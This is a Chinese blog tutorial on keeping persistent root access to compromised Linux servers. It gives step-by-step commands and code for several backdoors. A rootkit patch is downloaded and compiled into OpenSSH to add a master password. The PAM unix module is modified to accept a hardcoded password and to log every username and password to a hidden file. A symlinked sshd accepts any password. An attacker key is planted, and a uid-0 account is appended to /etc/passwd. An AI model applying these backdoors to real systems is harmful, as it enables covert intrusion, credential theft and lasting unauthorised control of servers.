内网渗透之Linux权限维持-OpenSSH&PAM后门&SSH软链接&公私钥登录

最新推荐文章于 2024-06-09 22:39:49 发布
最新推荐文章于 2024-06-09 22:39:49 发布
阅读量716 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux ssh 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130789327
版权
该文章详细介绍了如何在Linux系统中创建OpenSSH和PAM后门,包括替换OpenSSH软件以记录密码,编辑PAM源码实现万能密码登录,并记录登录信息,以及利用软链接、公私钥和新账户进行登录的方法。
摘要由CSDN通过智能技术生成

0x01替换版本-OpenSSH后门

原理:替换本身操作系统的ssh协议支撑软件openssh,重新安装自定义的openssh,达到记录帐号密码,也可以采用万能密码连接的功能!
可以修改软件版本和删除安装记录
1.环境准备:

yum -y install openssl openssl-devel pam-devel zlib zlib-devel    
yum -y install gcc gcc-c++ make  
yum -y install patch                                 
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar -xzvf openssh-5.9p1.tar.gz 
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1 && patch < sshbd5.9p1.diff

2.编辑密码:

vim includes.h
177行
#define SECRETPW "abc123"#万能密码

3.安装编译:

./configure --prefix=/usr  --sysconfdir=/etc/ssh  --with-pam  --with-kerberos5  && make && make install
service sshd restart   #重启sshd服务
systemctl status sshd.service #查看ssh启动状态

在这里插入图片描述

4.登录ssh

ssh root@192.168.85.128 
abc123

在这里插入图片描述
ssh服务重启失败
在这里插入图片描述

sshd -t
把报错的地方的key全部赋予600权限
chmod 600 /etc/ssh/ssh_host_ed25519_key

在这里插入图片描述
可能会出现
在这里插入图片描述
但是可以连接
拓展玩法:
1.可以采用万能密码登录
2.实现监控服务器登录登出的账号密码(发到外网)

0x02更改验证-SSH-PAM后门

PAM是一种认证模块,PAM可以作为Linux登录验证和各类基础服务的认证,简单来说就是一种用于Linux系统上的用户身份验证的机制。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持
1.获取目标系统所使用的PAM版本,下载对应版本的pam版本
2.解压缩,修改pam_unix_auth.c文件,添加万能密码
3.编译安装PAM
4.编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。

复现:

关闭selinux 
setenforce 0
查询版本 
rpm -qa | grep pam
wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
tar -zxvf Linux-PAM-1.1.8
yum install gcc flex flex-devel -y
-修改配置:
留PAM后门和保存SSH登录的账号密码
修改 Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
if(strcmp("hackers",p)==0){return PAM_SUCCESS;}    //后门密码
    if(retval == PAM_SUCCESS){    
           FILE * fp;    
           fp = fopen("/tmp/.sshlog", "a");//SSH登录用户密码保存位置
           fprintf(fp, "%s : %s\n", name, p);    
           fclose(fp);} 
name = p = NULL;
 
AUTH_RETURN;
-编译安装:
./configure && make
-备份复制:
备份原有pam_unix.so,防止出现错误登录不上
复制新PAM模块到/lib64/security/目录下 
cp /usr/lib64/security/pam_unix.so /tmp/pam_unix.so.bakcp
cd Linux-PAM-1.1.8/modules/pam_unix/.libs
cp pam_unix.so /usr/lib64/security/pam_unix.so

登录成功
在这里插入图片描述

0x03登录方式-软链接&公私钥&新帐号

1.SSH软链接
在sshd服务配置启用PAM认证的前提下,PAM配置文件中控制标志为sufficient时,只要pam_rootok模块检测uid为0(root)即可成功认证登录。
SSH配置中开启了PAM进行身份验证
kali的ssh配置

vim /etc/ssh/sshd_config
PermitRootLogin yes                   有就改为yes,没有就添加
PasswordAuthentication yes           有就改为yes,没有就添加

查看是否使用PAM进行身份验证:

cat /etc/ssh/sshd_config|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=4444
centos登录
ssh root@192.168.85.132 -p 4444                 任意密码登录即可

在这里插入图片描述
登录成功
在这里插入图片描述

2.公私钥

centos开启:

vim /etc/ssh/sshd_config
PermitRootLogin yes                   有就改为yes,没有就添加
PasswordAuthentication no           有就改为no,没有就添加
尾行添加
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys

kali生成密钥

ssh-keygen -t rsa    #三次回车

id_rsa : 私钥
id_rsa.pub : 公钥

将kali(攻击机的公钥内容复制到centos(攻击目标)的root目录下.ssh的authorized_keys文件中(此文件没有就新建)
kali登录

ssh root@192.168.85.128

登录成功
在这里插入图片描述

3.后门帐号
添加root用户

#添加账号test1,设置uid为0,密码为123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1
或
echo "test1:x:0:0::/:/bin/sh" >> /etc/passwd          #增加超级用户账号
passwd test1                             #修改xiaodi的密码为123456
mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bclinux升级ssh-openssh 9.5
01-16
openssh-9.5p1-1.el8.bclinux.x86_64.rpm openssh-clients-9.5p1-1.el8.bclinux.x86_64.rpm openssh-server-9.5p1-1.el8.bclinux.x86_64.rpm update.sh
麒麟Linux升级openssh-9.7p1脚本
03-21
修改脚本权限 chmod 777 update_ssh.sh 运行脚本就可以升级openssh至9.7 如果报错,先对脚本进行转码:dos2unix openssh/update_ssh.sh 在运行脚本 操作系统: Operating System:Kylin Linux Advanced Server V10 ...
SSH PAM后门(万能密码、记录密码)
网络安全。
08-19 3495
PAMLinux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。 1、在centos中需要关闭selinux。 永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。 2、查看PAM版本。 rpm -qa|grep pam 源码下载地址:http://www.linux-pam.org/library/ 3、解压。 wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 924
当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。这条命令的意思就是:首先alias是取一个叫ssh的别名,然后将登陆的密码日志就通过strace这个工具记录到tmp这个目录下并且以.sshpwd加上当前的日期时间为文件名的文件中。所以当我们执行ssh通过root去连接的时候,或者切换用户的时候,就会将密码记录到/tmp目录下的.sshpwd加上日期时间的日志里。
linux访问认证类-PAM模块学习1-附加ssh
最新发布
weixin_44364942的博客
06-09 920
一、PAM 1.不是一个应用程序,是一种认证框架,为各类应用程序(如:ssh、telnet、ftp、su)提供认证服务;例如ssh服务需要对用户的身份、特征(是普通用户还是root用户),用户的密码是否正确、是否过期,进行验证时就可以调用PAM模块;有了PAM模块,开发人员不再需要针对一个程序单独开发用户认证功能,直接调用PAM模块即可。 2.SSH服务本身具备基础的用户验证机制(在/etc/ssh/sshd_config文件中实现远程登录时,对于用户、密码等属性的限制),但并不丰富,易被攻击,
Linux权限维持(四)
pingan233的博客
02-24 115
当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。当然,钥免登陆这种用法不只是用在留后门,还可以在一些特殊情况下获取一个交互的 shell,如struts写入钥,oracle写入钥连接,Redis未授权访问等情景。,在受害机执行 ssh 登录其他主机的时候,会先执行我们前面记录输入的密码的指令,然后再去执行 ssh 命令。我们也可以利用这个命令去进行查找。
远程主机更换了密钥ssh登录失败 ssh-keygen
mixboot
02-20 1180
ssh-keygen 删除本地远程主机旧密钥 ssh-keygen -R hostname [-f known_hosts_file] ssh-keygen -f /Users/m1/.ssh/known_hosts -R "[192.168.1.10]:5520" 参考: ssh-keygen删除旧密钥 “主机密钥验证失败”时如何建立SSH密钥对
允许root登录,ssh配置root远程登陆
热门推荐
一行真人
01-25 1万+
允许root登录,ssh配置root远程登陆 vim /etc/ssh/sshd_config 查找以下并修改 PermitRootLogin yes #允许root登录 PermitEmptyPasswords no #不允许空密码登录 PasswordAuthentication yes # 设置是否使用口令验证。 重启ssh服务:service ssh restart 如果以上还不行的话 可以尝试修改root密码 sudo passwd root 然后输入两次密码重置 ...
openssh-centos7-9.5p1-ssh-copy-id-rpm.tgz
10-13
适用于centos 7 redhat 7 x86架构操作系统使用的openssh 9.5 p1 二进制rpm包 带有ssh-copy-id命令,2023年10月4日发布,当前最新版本,修复安全漏洞,更新升级openssh版本
terraform-tls-ssh-key-pair:用于生成SSH私钥文件的Terraform模块
02-04
terraform-tls-ssh-key-pair 用于生成SSH钥文件的Terraform模块。 该项目是我们针对DevOps的全面方法的一部分。 它是100%开源的,并根据许可。 从字面上看,我们有,它们都是开源的并且维护良好。 去看一下!...
centos7内网服务器离线升级到最新openssh-9.3p1版本,可解决openssh相关漏洞
05-19
可用于centos7内网服务器无法链接互联网的升级,可以解决OpenSSH权限提升漏洞(CVE-2021-41617)、OpenSSH 资源管理错误漏洞(CVE-2023-25136)等openssh相关漏洞; 执行命令:yum localinstall openssh-* -y 查看版本:...
Linux通过pam实现ssh登录
yiyu89的专栏
03-25 4174
准备工作搭建CentOS7,地址为:192.168.51.104 1.配置pam # 192.168.51.104 /etc/pam.d/sshd #%PAM-1.0 auth sufficient pam_python.so auth.py #新增内容 auth required pam_sepermit.so auth substack password-auth auth include postlogin # Used w
CentOS 利用pam控制ssh用户的登录SSH安全配置
耕耘——从菜鸟到高手的蜕变
04-30 1万+
CentOS 利用pam控制ssh用户的登录 有关pam的使用,请找相关的文档。下面只说两个简单的例子。 首先在/etc/pam.d/sshd加入一句: account    required     pam_access.so 然后再修改:/etc/security/access.conf,加上一句 -:ALL EXCEPT wheel: ALL 该文件的每一行由如下三个
PAM认证模块应用实训 :对SSH远程登录多次失败的用户账号进行锁定及解锁
qq_35447918的博客
05-05 2544
任务背景: 真实场景中的企业服务器,有时需要限制远程用户的登录次数,避免恶意用户多次尝试输入不同的密码,进行碰运气的撞库攻击,这个功能可以通过PAM认证模块的pam_tally2.so动态库来实现 操作步骤: 1)对Linux的进行基本网络配置,使得win7和Linux能互相ping通对方的Ip地址,确保win7和Linux网络是联通的 2)启动远程登录工具Xshell,新建SS...
权限维持Linux&OpenSSH&PAM后门&SSH软链接&私钥登录
今天是几号的博客
04-16 1631
可以找到以读写方式记录在文件中的SSH后门密码文件的位置,并通过该方法判断是否存在SSH后门。进行认证时首先确定是什么服务,然后加载相应的PAM的配置文件(位于/etc/pam.d),最后调用认证文件(于/lib/security)进行安全认证.简易利用的PAM后门也是通过修改PAM源码中认证的逻辑来达到权限维持。4、编译完后的文件在:modules/pam_unix/.libs/pam_unix.so,复制到/lib64/security中进行替换,即使用万能密码登陆,将用户名密码记录到文件中。
擂台赛-安全攻防之使用openssh后门获取root密码实战
低调,谦虚,自律,反思,成长,保持热爱,奔赴梦想
03-17 3939
安全从来无小事,防范意识勿放松,安全攻防之openssh后门获取root密码实战
Linux sudo详解
小楼一夜听春雨,深巷明朝卖杏花
02-13 2309
如果有两个用户,一个是用来管理网络属性,一个是用对用户进行管理,这就意味着这两个用户需要root的权限,那么这就超过他们需要的权限了,这就引入了sudo。 什么是sudo? Sudo是可以让某个用户不需要拥有管理员的账号密码,可以执行管理员的权限的。 作为管理员可以指派某些用户可以执行某些特定命令,类似与suid (不需要切换到某些用户下,但是可以执行这些用户的命令,不仅如此这些买了还...
Linux权限维持OpenSSH&PAM后门&SSH软连接&私钥登录
剁椒鱼头没剁椒的博客
08-22 2857
由于密码日志文件是被隐藏的,所以可以直接使用cat去查看,这里只要管理者使用ssh进行连接就会记录密码,而这些操作都是无感的,当然若管理员会去定期排查,那么该被发现还是会被发现的,这些都是基于管理员不会定期去排查才能够持久。这里要注意一个问题就是,不一定编译就能够成功,有时候根本无法编辑,从网上找的很多资料中,都跳过直接给命令,所以这里我就提前说一下,不一定能够编译成功,不成功再次重新测试,若还是不行,就拉到吧。这里重启也可能存在问题,这个实验有时候很莫名其妙的,有时候能够测试成功,有时候测试是不成功的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值